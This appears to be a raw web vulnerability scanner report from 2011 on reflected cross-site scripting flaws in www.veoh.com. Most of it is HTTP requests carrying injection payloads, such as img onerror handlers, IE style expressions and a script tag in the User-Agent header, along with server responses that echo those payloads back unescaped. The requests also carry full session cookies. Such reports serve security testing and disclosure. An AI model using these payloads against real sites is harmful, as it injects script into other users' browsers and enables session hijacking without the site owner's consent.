GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4420 Date: Thu, 03 Feb 2011 21:46:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=34
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4446 Date: Thu, 03 Feb 2011 21:46:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4498 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=49
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4550 Date: Thu, 03 Feb 2011 21:46:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=81
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:21 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 26859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/ ...[SNIP]... <a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick=""> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:08 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=67 Content-Length: 59484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:43 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 59675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:48:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 60152
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:49:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=62 Content-Length: 59961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=88 Content-Length: 32282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:22 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=63 Content-Length: 30205
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" /> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1 Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:15 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=70 Content-Length: 32288
